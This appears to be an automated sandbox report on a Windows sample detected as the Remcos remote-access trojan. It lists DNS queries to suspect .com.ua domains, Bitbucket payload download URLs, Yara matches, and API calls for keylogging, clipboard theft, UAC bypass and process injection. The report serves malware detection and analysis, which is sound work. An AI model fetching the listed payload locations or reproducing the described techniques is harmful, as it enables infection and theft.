Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: zara.master-workdone.com.ua
Source: global traffic DNS traffic detected: DNS query: manazara.master-workdone.com.ua
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SndVol.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: jW3NEKvxH1.exe, 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, SndVol.exe, 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-6
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000819000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020B1D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/ma
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029299E4 SetWindowsHookExA 0000000D,029299D0,00000000 6_2_029299E4
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_2_02935A45
Contains functionality to modify clipboard data
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029359C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_2_029359C6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029559C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 19_2_029559C6
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_2_02935A45
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02929B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 6_2_02929B10
Yara detected Keylogger Generic
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293BB77 SystemParametersInfoW, 6_2_0293BB77
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295BB77 SystemParametersInfoW, 19_2_0295BB77

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48730 NtQueueApcThread, 0_2_02D48730
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47A2C NtAllocateVirtualMemory, 0_2_02D47A2C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02D4DC8C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D4DC04
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02D4DD70
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47D78 NtWriteVirtualMemory, 0_2_02D47D78
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48D70 GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02D48D70
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48D6E GetThreadContext,SetThreadContext,NtResumeThread, 0_2_02D48D6E
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47A2A NtAllocateVirtualMemory, 0_2_02D47A2A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D4DBB0
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E464CA NtQueryInformationToken, 9_2_00E464CA
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 9_2_00E57460
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 9_2_00E44823
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 9_2_00E4643A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 9_2_00E5C1FA
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5A135 NtSetInformationFile, 9_2_00E5A135
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E46500 NtQueryInformationToken,NtQueryInformationToken, 9_2_00E46500
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 9_2_00E34E3B
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 9_2_00E44759
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E464CA NtQueryInformationToken, 11_2_00E464CA
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 11_2_00E57460
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 11_2_00E44823
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 11_2_00E4643A
